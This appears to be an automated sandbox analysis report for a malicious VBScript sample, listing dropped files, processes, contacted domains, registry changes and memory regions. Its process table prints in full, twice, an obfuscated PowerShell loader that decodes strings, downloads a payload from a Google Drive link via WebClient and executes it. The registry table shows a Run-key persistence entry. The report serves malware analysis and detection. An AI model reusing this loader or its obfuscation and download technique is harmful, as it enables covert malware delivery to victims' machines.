Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Inquiry Studbolt - 240703.vbe
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2jggd3f.0gy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhx2myhm.43u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmx2r0kx.r2f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi4jvttu.wlo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Belleric74.Afs
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens
Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks
Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities
Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes
Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta
Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For(
$Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function
Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru
He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV
c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA
agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p
Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE
7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades
= Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K,
HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS
Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke
uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.)
');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir
iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.:
,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun
,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende
($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD
AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv.
uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende
(Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U
A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e
rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT.
.u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis
rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye
,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei
AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende
(Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV
aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y
As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol
Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue
em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l
,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c
Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De
');Influerende $Effected;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens
Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks
Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities
Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes
Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta
Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For(
$Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function
Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru
He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV
c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA
agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p
Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE
7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades
= Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K,
HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS
Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke
uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.)
');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir
iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.:
,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun
,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende
($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD
AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv.
uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende
(Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U
A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e
rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT.
.u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis
rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye
,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei
AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende
(Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV
aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y
As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol
Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue
em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l
,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c
Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De
');Influerende $Effected;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
|
"C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
|
"C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png4
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.pngh
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html4
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://aka.ms/pscore6lB7q
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester4
|
unknown
|
||
|
https://drive.google.com/FP
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.htmlXz
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
http://crl.microso
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://github.com/Pester/Pesterh
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.htmlh
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://github.com/Pester/PesterXz
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
https://drive.google.co
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
http://pesterbdd.com/images/Pester.pngXz
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
drive.google.com
|
142.250.191.110
|
||
|
drive.usercontent.google.com
|
172.217.2.33
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
172.217.2.33
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.191.110
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
GrOcCQC
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 26 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8A70000
|
direct allocation
|
page execute and read and write
|
|
|
|
8CCF000
|
direct allocation
|
page execute and read and write
|
|
|
|
14C38950000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
789C000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2CED000
|
trusted library allocation
|
page execute and read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
94D4EFE000
|
stack
|
page read and write
|
||
|
2165CD3A000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
23330000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
2E11000
|
heap
|
page read and write
|
||
|
2165B32B000
|
trusted library allocation
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
7280000
|
heap
|
page read and write
|
||
|
7FFE57810000
|
trusted library allocation
|
page execute and read and write
|
||
|
73E000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
25E76E29000
|
heap
|
page read and write
|
||
|
25E76E26000
|
heap
|
page read and write
|
||
|
7096000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
21658340000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
21C79000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
5088000
|
heap
|
page read and write
|
||
|
232A0000
|
trusted library allocation
|
page read and write
|
||
|
94D50FE000
|
stack
|
page read and write
|
||
|
29F0000
|
unclassified section
|
page readonly
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165A6F6000
|
trusted library allocation
|
page read and write
|
||
|
2D08000
|
heap
|
page read and write
|
||
|
2086E000
|
stack
|
page read and write
|
||
|
22DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FD000
|
unkown
|
page readonly
|
||
|
4B5F000
|
stack
|
page read and write
|
||
|
46B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EC7000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
7A20000
|
heap
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
21672408000
|
heap
|
page read and write
|
||
|
216580D6000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
7E5000
|
unkown
|
page readonly
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
5BC000
|
stack
|
page read and write
|
||
|
7F5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
94D517E000
|
stack
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
515C000
|
heap
|
page read and write
|
||
|
2165A6FE000
|
trusted library allocation
|
page read and write
|
||
|
21669E21000
|
trusted library allocation
|
page read and write
|
||
|
5310000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
46A0000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE579A0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
7E1000
|
unkown
|
page execute read
|
||
|
2A2C000
|
heap
|
page read and write
|
||
|
7FFE576FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7440000
|
heap
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page read and write
|
||
|
21672295000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
46D1000
|
trusted library allocation
